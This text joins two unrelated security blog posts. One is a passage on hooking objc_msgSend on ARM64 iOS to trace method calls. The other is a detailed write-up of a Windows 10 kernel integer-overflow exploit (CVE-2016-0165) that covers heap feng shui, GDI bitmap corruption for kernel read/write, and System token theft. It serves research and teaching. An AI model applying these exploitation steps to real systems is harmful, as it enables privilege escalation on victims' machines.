    • CBZ Wn|Xn, label jumps to PC relative offset if Wn is equal to zero.
    • TBNZ Xn|Wn, #uimm6, label jumps to PC relative offset if bit number uimm6 in register Xn is not zero.
    • TBZ Xn|Wn, #uimm6, label jumps to PC relative offset if bit number uimm6 in register Xn is zero.
  2. Unconditional Branches:
    • B label jumps to PC relative offset.
    • BL label jumps to PC relative offset, writing the address of the next sequential instruction to register X30. Typically used for making function calls.
  3. Unconditional Branches to register:
    • BLR Xm unconditionally jumps to address in Xm, writing the address of the next sequential instruction to register X30.
    • BR Xm jumps to address in Xm.
    • RET {Xm} jumps to register Xm.

We don’t particular care about category three because, register states should not influenced by our hooking mechanism. However, category one and two are PC relative and therefore need to be updated if found in the preamble.

So, I wrote a function that updates the instructions. At the moment it only handles a subset of cases, specifically the B.cond and B instructions. The former is found in objc_msgSend.

__text:18DBB41C0  EXPORT _objc_msgSend
__text:18DBB41C0   _objc_msgSend 
__text:18DBB41C0     CMP             X0, #0
__text:18DBB41C4     B.LE            loc_18DBB4230
__text:18DBB41C8   loc_18DBB41C8
__text:18DBB41C8     LDR             X13, [X0]
__text:18DBB41CC     AND             X9, X13, #0x1FFFFFFF8

Now, I don’t know about you but I don’t particularly like to use complicated bit-wise operations to extract and modify data. It’s kind of fun to do so, but it is also fragile and hard to read. Luckily for us, C was designed to work at such a low level. Each ARM64 instruction is four bytes and so we use bit fields in C structures to deal with them!

typedef struct {
    uint32_t offset   : 26;
    uint32_t inst_num : 6;
} inst_b;

This is the unconditional PC relative jump.

typedef struct {
    uint32_t condition: 4;
    uint32_t reserved : 1;
    uint32_t offset   : 19;
    uint32_t inst_num : 8;
} inst_b_cond;

And this one is the conditional PC relative jump. Back in the day, I wrote a plugin for IDAPro that gives the details of instruction under the cursor. It is called IdaRef and, for it, I produced an ASCII text file that has all the instruction and their bit fields clearly written out [3]. So the B.cond looks like this in memory. Notice right to left bit numbering.

31 30 29 28 27 26 25 24 23                                                              5 4 3            0
0  1  0  1  0  1  0  0                                      imm19                         0     cond

That is what we map our inst_b_cond structure to. Doing so allows us very easy abstraction over bit manipulation.

void check_branches(s_jump_page* t_func, instruction_t* o_func) {
        instruction_t inst = t_func->inst[i];
        inst_b*       i_b      = (inst_b*)&inst;
        inst_b_cond*  i_b_cond = (inst_b_cond*)&inst;

        } else if(i_b_cond->inst_num == 0x54) {
            // conditional branch

            // save the original branch offset
            branch_offset = i_b_cond->offset;
            i_b_cond->offset = patch_offset;

            // set jump point into the original function, 
            //   don't forget that it is PC relative
            t_func->jump_patch[use_jump_patch].jmp_addr = 
                 	+ branch_offset + i);

With some important details removed, I’d like to highlight how we are checking the type of the instruction by overlaying the structure over the instruction integer and checking to see if the value of the instruction number is correct. If it is, then we use that pointer to read the offset and modify it to point to one of the jump patches. In the patch we place the absolute value of the address where the instruction would’ve jumped were it still back in the original objc_msgSend function. We do so for every branch instruction we might encounter.

Once the jump page is constructed we insert the patch into objc_msgSend and complete the loop. The most important thing is, of course, that the hook function restores all the registers to the state just before CPU enters into objc_msgSend otherwise the whole thing will probably crash.

It is important to note that at the moment we require that the function to be hooked has to be at least four instructions long because that is the size of the patch. Other than that we don’t even care if the target is a proper C function.

Do look through the implementation [4], I skip over some details that glues things together but the important bits that I mention should be enough to understand, in great detail, what is happening under the hood.

Interpreting the call

Now that function hooking is done, it is time to level up and interpret the results. This is where we actually implement the objc_trace functionality. So, the patch to objc_msgSend actually redirects execution to one of our functions:

id objc_msgSend_trace(id self, SEL op) {
    __asm__ __volatile__ (
        "stp fp, lr, [sp, #-16]!;\n"
        "mov fp, sp;\n"

        "sub    sp, sp, #(10*8 + 8*16);\n"
        "stp    q0, q1, [sp, #(0*16)];\n"
        "stp    q2, q3, [sp, #(2*16)];\n"
        "stp    q4, q5, [sp, #(4*16)];\n"
        "stp    q6, q7, [sp, #(6*16)];\n"
        "stp    x0, x1, [sp, #(8*16+0*8)];\n"
        "stp    x2, x3, [sp, #(8*16+2*8)];\n"
        "stp    x4, x5, [sp, #(8*16+4*8)];\n"
        "stp    x6, x7, [sp, #(8*16+6*8)];\n"
        "str    x8,     [sp, #(8*16+8*8)];\n"

        "BL _hook_callback64_pre;\n"
        "mov x9, x0;\n"

        // Restore all the parameter registers to the initial state.
        "ldp    q0, q1, [sp, #(0*16)];\n"
        "ldp    q2, q3, [sp, #(2*16)];\n"
        "ldp    q4, q5, [sp, #(4*16)];\n"
        "ldp    q6, q7, [sp, #(6*16)];\n"
        "ldp    x0, x1, [sp, #(8*16+0*8)];\n"
        "ldp    x2, x3, [sp, #(8*16+2*8)];\n"
        "ldp    x4, x5, [sp, #(8*16+4*8)];\n"
        "ldp    x6, x7, [sp, #(8*16+6*8)];\n"
        "ldr    x8,     [sp, #(8*16+8*8)];\n"
        // Restore the stack pointer, frame pointer and link register
        "mov    sp, fp;\n"
        "ldp    fp, lr, [sp], #16;\n"

        "BR x9;\n"       // call the jump page

This function stores all calling convention relevant registers on the stack and calls our, _hook_callback64_pre, regular C function that can assume that it is the objc_msgSend as it was called. In this function we can read parameters as if they were sent to the method call, this includes the class instance and the selector. Once _hook_callback64_pre returns our objc_msgSend_trace function will restore the registers and branch to the configured jump page which will eventually branch back to the original call.

void* hook_callback64_pre(id self, SEL op, void* a1, void* a2, void* a3, void* a4, void* a5) {
	// get the important bits: class, function
    char* classname = (char*) object_getClassName( self );
    if(classname == NULL) {
        classname = "nil";
    char* opname = (char*) op;
    return original_msgSend;

Once we get into the hook_callback64_pre function, things get much simpler since we can use the objc API to do our work. The only trick is the realization that the SEL type is actually a char* which we cast directly. This gives us the full selector. Counting colons will give us the count of parameters the method is expecting. When everything is done the output looks something like this:

iPhone:~ root# DYLD_INSERT_LIBRARIES=libobjc_trace.dylib /Applications/Maps.app/Maps
objc_msgSend function substrated from 0x197967bc0 to 0x10065b730, trampoline 0x100718000
000000009c158310: [NSStringROMKeySet_Embedded alloc ()]
000000009c158310: [NSSharedKeySet initialize ()]
000000009c158310: [NSStringROMKeySet_Embedded initialize ()]
000000009c158310: [NSStringROMKeySet_Embedded init ()]
000000009c158310: [NSStringROMKeySet_Embedded initWithKeys:count: (0x0 0x0 )]
000000009c158310: [NSStringROMKeySet_Embedded setSelect: (0x1 )]
000000009c158310: [NSStringROMKeySet_Embedded setC: (0x1 )]
000000009c158310: [NSStringROMKeySet_Embedded setM: (0xf6a )]
000000009c158310: [NSStringROMKeySet_Embedded setFactor: (0x7b5 )]


We modify the objc_msgSend preamble to jump to our hook function. The hook function then does whatever and restores the CPU state. It then jumps into the jump page which executes the possibly modified preamble instructions and jumps back into objc_msgSend to continue execution. We also maintain the original unmodified preamble for restoration when we need to remove the hook. Then we use the parameters that were sent to objc_msgSend to interpret the call and print out which method was called with which parameters.

As you can see using function hooking for making objc_trace is but one use case. But this use case is incredibly useful for blackbox security testing. That is particularly true for initial discovery work of learning about the application.

[1] objc-msg-arm64.s

[2] ARM Reference Manual

[3] ARM Instruction Details

[4] objc_trace.m

MS16-039 — «Windows 10» 64 bits Integer Overflow exploitation by using GDI objects

On April 12, 2016 Microsoft released 13 security bulletins.
Let’s to talk about how I triggered and exploited the CVE-2016-0165, one of the MS16-039 fixes.

Diffing Stage

For  MS16-039, Microsoft released a fix for all Window versions, either for 32 and 64 bits.
Four vulnerabilities were fixed: CVE-2016-0143, CVE-2016-0145, CVE-2016-0165 y CVE-2016-0167.

Diffing «win32kbase.sys» (v10.0.10586.162 vs v10.0.10586.212), I found 26 changed functions.
Among all the functions that had been changed, I focused on a single function: «RGNMEMOBJ::vCreate».


It’s interesting to say that this function started to be exported since Windows 10, when «win32k.sys» was split into 3 parts:  «win32kbase.sys», «win32kfull.sys» and a very small version of «win32k.sys».

If we look at the diff between the old and the new function version, we can see on the right side that in the first red basic block (left-top), there is a call to «UIntAdd» function.
This new basic block checks that the original instruction «lea eax,[rdi+1]» (first instruction on the left-yellow basic block) won’t produce an integer overflow when the addition is made.

In the second red basic block (right-down) there is a call to «UIntMult» function.
This function checks that the original instruction «lea ecx,[rax+rax*2]» (third instruction on the left-yellow basic block) won’t produce an integer overflow when the multiplication is made.

Summing up, two integer overflows were patched in the same function.


Understanding the fix

If we look at the 3rd instruction of the original basic block (left-yellow), we can see this one:

"lea ecx,[rax+rax*2]"

In this addition/multiplication, the «rax» register represents the number of POINT structs to be handled.
In this case, this number is multiplied by 3 (1+1*2).

At the same time, we can see that the structs number is represented by a 64 bit register, but the destination of this calculation is a 32 bit register!

Now, we know that it’s an integer overflow, the only thing we need to know is what number multiplied by 3 gives us a bigger result than 4GB.
The idea is that this result can’t be represented by a 32 bit number.

A simple way to know that is making the next calculation:

(4,294,967,296 (2^32) / 3) + 1 = 1,431,655,766 (0x55555556)

Now, if we multiplied this result by 3, we will obtain the next one:

 0x55555556 x 3 = 0x1'0000'0002 = 4GB + 2 bytes

In the same basic block and two instructions below («shl ecx,4»), we can see that the number «2» obtained previously will be shifted 4 times to the left, which is the same to multiply this one by 16, resulting in the 0x20 value.

So, the «PALLOCMEM2» function is going to allocate 0x20 bytes to be used by 0x55555556 POINT structs … 🙂

Path to the vulnerability

For the development of this exploit, the path I took was via the «NtGdiPathToRegion» function, located in «win32kfull.sys».
This function calls directly to the vulnerable function.


From user space, this function is located in «gdi32.dll» and it’s exported as «PathToRegion«.

Triggering the vulnerability

Now we know the bug, we need 0x55555556 POINT structs to trigger this vulnerability but, is it possible to
reach this number of POINTs?

In the exploit I wrote, the function that I used to create POINT structs was «PolylineTo«.

Looking at the documentation, we see this definition:

BOOL PolylineTo(
 _In_ HDC hdc,
 _In_ const POINT *lppt,
 _In_ DWORD cCount

The second argument is a POINT struct array and the third one is the array size.

It’s easy to think that, if we create 0x55555556 structs and then, we pass this structures as parameter we will trigger the vulnerability but WE WON’T, let’s see why.

If we analyze the «PolylineTo» internal code, we can see a call to «NtGdiPolyPolyDraw».


«NtGdiPolyPolyDraw» is located in «win32kbase.sys», part of the Windows kernel.

If we see this function, there is a check in the POINT struct number passed as argument:


The maximum POINTs number that we can pass as parameter is 0x4E2000.

It’s clear that there is not a direct way to reach the wanted number to trigger this vulnerability, so what is the trick ?

Well, after some tests, the answer was pretty simple: «call many times to PolylineTo until reach the wanted number of POINT structs».

And the result was this:


The trick is to understand that the «PathToRegion» function processes the sum of all POINT structs assigned to the HDC passed as argument.

PALLOCMEM2 function — «Bonus Track»

Triggering this vulnerability is relatively easy in 64 bit targets like Windows 8, 8.1 y 10.
Now, in «Windows 7» 64 bits, the vulnerability is very difficult to exploit.

Let’s see the vulnerable basic block and the memory allocator function:


The destination of the multiplication by 3 is a 64 bit register (rdx), not a 32 bit register like Windows versions mentioned before.

The only feasible way to produce an integer overflow is with the previous instruction:


In this case, the number of POINTs to be assigned to the HDC should be greater than or equal to 4GB.
Unfortunately, during my tests it was easier to get a kernel memory exhaustion than allocate this number of structures.

Now, why Windows 7 is different to the latest Windows versions ?

Well, if we look the previous picture, we can see that there is a call to «__imp_ExAllocatePoolWithTag», instead of «PALLOCMEM2».

What is the difference ?

The «PALLOCMEM2» function receives a 32 bit argument size, but the  «__imp_ExAllocatePoolWithTag» function receives a 64 bit argument size.
The argument type defines how the result of the multiplication will be passed to the function allocator, in this case, the result is casted to «unsigned int».

We could guess that functions that used to call «__imp_ExAllocatePoolWithTag» in Windows 7 and now they call «PALLOCMEM2» have been exposed to integer overflows much easier to exploit.

Analyzing the heap overflow

Once we trigger the integer overflow, we have to understand what the consequences are.

As a result, we obtain a heap overflow produced by the copy of POINT structs, via the «bConstructGET» function (child of the vulnerable function), where every single struct is copied by «AddEdgeToGet».


This heap overflow is produced when POINT structs are converted and copied to the small allocated memory.

It’s intuitive to think that, if 0x55555556 POINT structs were allocated, the same number will be copied.
If this were true, we would have a huge «memcpy» that it would destroy a big part of the Windows kernel heap, which quickly would give us a BSoD.

What makes it a nice bug is that the «memcpy» can be controlled exactly with the number of POINTs that we want, regardless of the total number passed to the the vulnerable function.

The trick here is that only POINT structs are copied when coordinates ARE NOT REPEATED.
E.g: if «POINT.A is X=30/Y=40» and «POINT.B is X=30/Y=40», only one will be copied.

Thus, it’s possible to control exactly how many structures will be used by the heap overflow.

Some exploitation considerations

One of the most important things to know before to start to write the exploit is that, the vulnerable function allocates memory and produces the heap overflow, but when this function finishes, it frees the allocated memory, since this is used only temporarily.


It means that, when the memory is freed, the Windows kernel will check the current heap chunk header and the next one.
If the next one is corrupted, we will get a BSoD.

Unfortunately, only some values to be overwritten are totally controlled by us, so, we are not able to overwrite the next chunk header with its original content.

On the other hand, we could think the alloc/free operation like «atomic», because we don’t have control execution until the «PathToRegion» function returns.

So, How is it possible to successfully exploit this vulnerability ?

Four years ago I explained something similar in the»The Big Trick Behind Exploit MS12-034» blogpost.

Without a deep reading of the blogpost previously mentioned, the only thing to know is that if the allocated memory chunk is at the end of the 4KB memory page, THERE WON’T BE A NEXT CHUNK HEADER.

So, if the vulnerable function is able to allocate at the end of the memory page, the heap overflow will be done in the next page.
It means that the DATA contained by the second memory page will be corrupted but, we will avoid a BSoD when the allocated memory is freed.

Finding the best memory allocator

Considering the previous one, now it’s necessary to create a very precise heap spray to be able to allocate memory at the end of the memory page.


When heap spray requires several interactions, meaning that memory chunks are allocated and freed many times, the name used for this technique is «Heap Feng Shui», making reference to the ancient Chinese technique (https://en.wikipedia.org/wiki/Feng_shui).

The POOL TYPE used by the vulnerable function is 0x21, which according to Microsoft means «NonPagedPoolSession» + «NonPagedPoolExecute».

Knowing this, it’s necessary to find some function that allow us to allocate memory in this pool type with the best possible accuracy.

The best function that I have found to heap spray the pool type 0x21 is via the «ZwUserConvertMemHandle» undocumented function, located in «gdi32.dll» and «user32.dll».


When this function is called from user space, the «NtUserConvertMemHandle» function is invoked in kernel space, and this one calls «ConvertMemHandle», both located in «win32kfull.sys».

If we look at the «ConvertMemHandle» code, we can see the perfect allocator:


Basically, this function receives 2 parameters, BUFFER and SIZE and returns a HANDLE.

If we only see the yellow basic blocks, we can see that the «HMAllocObject» function allocates memory through «HMAllocObject».
This function allocates SIZE + 0x14 bytes.
After that, our DATA is copied by «memcpy» to this new memory chunk and it will stay there until it’s freed.

To free the memory chunk created by «NtUserConvertMemHandle», we have to call two functions consecutively: «SetClipboardData» and «EmptyClipboard«.

Summing up, we have a function that allows us to allocate and free memory in the same place where the heap overflow will be done.

Choosing GDI objects to be overwritten

Now, we know how to make a good Heap Feng Shui, we need to find something interesting to be corrupted by the heap overflow.

Considering Diego Juarez’s blogpost «Abusing GDI for ring0 exploit primitives» and exchanging some ideas with him, we remembered that GDI objects are allocated in the pool type 0x21, which is exactly what I needed to exploit this vulnerability.

In that blogpost he described how GDI objects are composed:

typedef struct
   BASEOBJECT64 BaseObject;
   SURFOBJ64 SurfObj;

As explained in the blogpost mentioned above, if the «SURFOBJ64.pvScan0» field is overwritten, we could read or write memory where we want by calling «GetBitmapBits/SetBitmapBits».

In my case, the problem is that I don’t control all values to be overwritten by the heap overflow, so, I can’t overwrite this property with an USEFUL ADDRESS.

A variant of abusing GDI object

Taking into account the previous information, I decided to find another GDI object property to be overwritten by the heap overflow.

After some tests, I found a very interesting thing, the «SURFOBJ64.sizlBitmap» field.
This field is a SIZE struct that defines width and height of the GDI object.

This picture shows the content of the GDI object, before and after the heap overflow:

The final result is that the «cx» property of the «SURFOBJ64.sizlBitmap» SIZE struct is set with the 0xFFFFFFFF value.
It means that now the GDI object is width=0xFFFFFFFF and height=0x01.

So, we are able to read/write contiguous memory far beyond the original limits set for «SURFOBJ64.pvScan0»!

Another interesting thing to know is that, when GDI objects are smaller than 4KB, the DATA pointed by «SURFOBJ64.pvScan0» is contiguous to the object properties.

With all these things, it was time to write an exploit …

Exploitation — Step 1

In the exploit I wrote, I used 0x55555557 POINT structs, which is one more point than what I gave as an example.

So, the new calculation is:

0x55555557 x 3 = 0x1'0000'0005

As the result is a 32 bit number, we get 0x5, an then this number is multiplied by 16

0x5 << 4 = 0x50

It means that «PALLOCMEM2» function will allocate 0x50 bytes when the vulnerable function calls it.

The reason why I decided to increase the size by 0x30 bytes is because very small chunk allocations are not always predictable.

Adding the chunk header size (0x10 bytes), the heap spray to do should be like this:ms16_039-heap-spray-candidate

Looking at the previous picture, only one FREE chunk will be used by the vulnerable function.
When this happens, there will be a GDI object next to this one.

For alignment problems between the used small chunk and the «SURFOBJ64.sizlBitmap.cx» property, it was necessary to use an extra PADDING chunk.
It means that three different memory chunks were used to make this heap feng shui.

Hitting a breakpoint after the memory allocation, we can see how the heap spray worked and what position, inside the 4KB memory page, was used by the vulnerable function.


Making some calculations, we can see that if we add «0x60 + 0xbf0» bytes to the allocated chunk, we get the first GDI object (Gh15) next to it.

Exploitation — Step 1.5

Once a GDI object has been overwritten by the heap overflow, it’s necessary to know which one it is.

As the heap spray uses a big number of GDI objects, 4096 in my case, the next step is to go through the GDI object array and detect which has been modified by calling «GetBitmapBits».
When this function is able to read beyond the original object limits, it means that the overwritten GDI object has been found.

Looking at the function prototype:

HBITMAP CreateBitmap(
 _In_ int nWidth,
 _In_ int nHeight,
 _In_ UINT cPlanes,
 _In_ UINT cBitsPerPel,
 _In_ const VOID *lpvBits

As an example, we could create a GDI object like this:

CreateBitmap (100, 100, 1, 32, lpvBits);

Once the object has been created, if we call «GetBitmapBits» with a size bigger than 100 x 100 x 4 bytes (32 bits) it will fail, except if this object has been overwritten afterwards.

So, the way to detect which GDI object has been modified is to check when its behavior is different than expected.

Exploitation — Step 2

Now we can read/write beyond the GDI object limits, we could use this new skill to overwrite a second GDI object, and thus, to get an arbitrary write.

Looking at our heap spray, we can see that there is a second GDI object located 0x1000 bytes after from the first one.


So, if from the first GDI object, we are able to write the contiguous memory that we want, it means that we can modify the «SURFOBJ64.pvScan0» property of the second one.

Then, if we use the second GDI object by calling «GetBitmapBits/SetBitmapBits», we are able to read/write where we want to because we control exactly which address will be used.

Thus, if we repeat the above steps, we are able to read/write ‘n’ times any kernel memory address from USER SPACE, and at the same time, we will avoid running ring-0 shellcode in kernel space.

It’s important to say that before overwriting the «SURFOBJ64.pvScan0» property of the second GDI object, we have to read all DATA between both GDI objects, and then overwrite the same data up to the property we want to modify.

On the other hand, it’s pretty simple to detect which is the second GDI object, because when we read DATA between both objects, we are getting a lot of information, including its HANDLE.

Summing up, we use the heap overflow to overwrite a GDI object, and from this object to overwrite a second GDI object next to it.

Exploitation — Final Stage

Once we get a kernel read/write primitive, we could say that the last step is pretty simple.

The idea is to steal the «System» process token and set it to our process (exploit.exe).

As this attack is done from «Low Integrity Level», we have to know that it’s not possible to get TOKEN addresses by calling «NtQuerySystemInformation» («SystemInformationClass = SystemModuleInformation»), so, we have to take the long way.

The EPROCESS list is a linked list, where every element is a EPROCESS struct that contains information about a unique running process, including its TOKEN.

This list is pointed by the «PsInitialSystemProcess» symbol, located in «ntoskrnl.exe».
So, if we get the Windows kernel base, we could get the «PsInitialSystemProcess» kernel address, and then to do the famous TOKEN KIDNAPPING.

The best way I know of leaking a Windows kernel address is by using the «sidt» user-mode instruction.
This instruction returns the size and address of the operating system interrupt list located in kernel space.

Every single entry contains a pointer to its interrupt handler located in «ntoskrnl.exe».
So, if we use the primitive we got previously, we are able to read these entries and get one «ntoskrnl.exe» interrupt handler address.

The next step is to read backwards several «ntoskrnl.exe» memory addresses until you find the well known «MZ», which means it’s the base address of «ntoskrnl.exe».

Once we get the Windows kernel base, we only need to know what the «PsInitialSystemProcess» kernel address is.
Fortunately, from USER SPACE it’s possible to use the «LoadLibrary» function to load «ntoskrnl.exe» and then to use «GetProcAddress» to get the «PsInitialSystemProcess» relative offset.

As a result of what I explained before, I obtained this:


Final notes

It’s important to say that it wasn’t necessary to use the GDI objects memory leak explained by the «Abusing GDI for ring0 exploit primitives» blogpost.

However, it’s interesting to see how «Windows 10» 64 bits can be exploited from «Low Integrity Level» through kernel vulnerabilities, despite all kernel exploit mitigations implemented until now.